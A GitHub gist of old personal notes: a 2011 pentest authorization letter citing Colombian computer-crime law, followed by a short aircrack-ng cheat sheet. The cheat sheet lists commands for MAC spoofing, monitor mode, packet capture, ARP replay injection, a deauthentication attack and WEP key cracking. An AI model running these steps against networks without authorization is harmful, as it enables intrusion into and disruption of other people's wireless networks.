Created
May 1, 2016 19:31
-
-
Save h3ct0rjs/eb2836ff701ee6d752b6b7cba4d2dbf8 to your computer and use it in GitHub Desktop.
oldnotes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
July 29 2011 | |
Dear Client | |
The pentest in your area will describe the issues for wireless networks in near area's,also the | |
implementation and testing will be done by hector Jimenez for simple pourpouses of study ,any malicious | |
activity or choice won't be part of pentester,H owever Law 1273 of 2009 The Colombian Republic Stablish: | |
"Articulo 1 ": | |
ARTÍCULO 269A. ACCESO ABUSIVO A UN SISTEMA INFORMÁTICO. | |
<Artículo adicionado por el artículo 1 dela Ley 1273 de 2009. El nuevo texto es el siguiente:> | |
El que, sin autorización o por fuera de lo acordado, acceda en todo o en parte a un sistema informático protegido | |
o no con una medida de seguridad, o se mantenga dentro del mismo en contra de la voluntad de quien tenga el legítimo | |
derecho a excluirlo, incurrirá en pena de prisión de cuarenta y ocho (48) a noventa y seis (96) | |
meses y en multa de 100 a 1.000 salarios mínimos legales mensuales vigentes. | |
ARTÍCULO 269C. INTERCEPTACIÓN DE DATOS INFORMÁTICOS. <Artículo adicionado por el artículo 1 de la | |
Ley 1273 de 2009. El nuevo texto es el siguiente:> El que, sin orden judicial previa intercepte | |
datos informáticos en su origen, destino o en el interior de un sistema informático, o la | |
emisiones electromagnéticas provenientes de un sistema informático que los transporte incurrirá | |
en pena de prisión de treinta yseis (36) a setenta y dos (72) meses. | |
The client will keep all responsability of all actions conducted by penetration tester in this | |
case Hector F. Jimenez. | |
If you agree with this please firm the same file with gpg or digital signature ! and give a copy to the Pentester | |
and keep a copy for you just in cases of troubles. | |
For this licences User Agreement dont aply : | |
Artículo 269E: Uso de software malicioso. El que, sin estar facultado para ello, produzca, | |
trafique, adquiera, distribuya, venda, envíe, introduzca o extraiga del territorio nacional | |
software malicioso u otros programas de computación de efectos dañinos, | |
incurrirá en pena de prisión de cuarenta y ocho (48) a noventa y seis (96) meses y | |
en multa de 100 a 1.000 salarios mínimos legales mensuales vigentes. | |
all md5sum apply here and all states . |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Simple Sheetcheat ! I hope that this works in the future. | |
With client connect ! | |
ifconfig | |
ifconfig wlan0 down | |
macchanger --random wlan0 | |
ifconfig wlan0 up | |
airmon-ng | |
airmon-ng start wlan0 | |
airodump-ng mon0 | |
airodump-ng -c 1 -b XX:XX:XX:XX -w c1b3rh4ck mon0 | |
aireplay-ng -1 0 -a XX:XX:XX:XX mon0 | |
aireplay-ng -3 -b XX:XX:XX:XX mon0 | |
aireplay-ng -0 0 -a XX:XX:XX:XX mon0(Special Attack) | |
aircrack-ng c1b3rh4ck.cap or pcap ! | |
without client the same but dont make the desauthentication coded by c1b3rh4ck :-D | |
xx:xx:xx:xx:xx << bssid of AP ! | |
For crack Wpa-Wpa2 i would like to implement a new mathematical algoritm,may be before :-D cheerz | |
careloca de John ! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment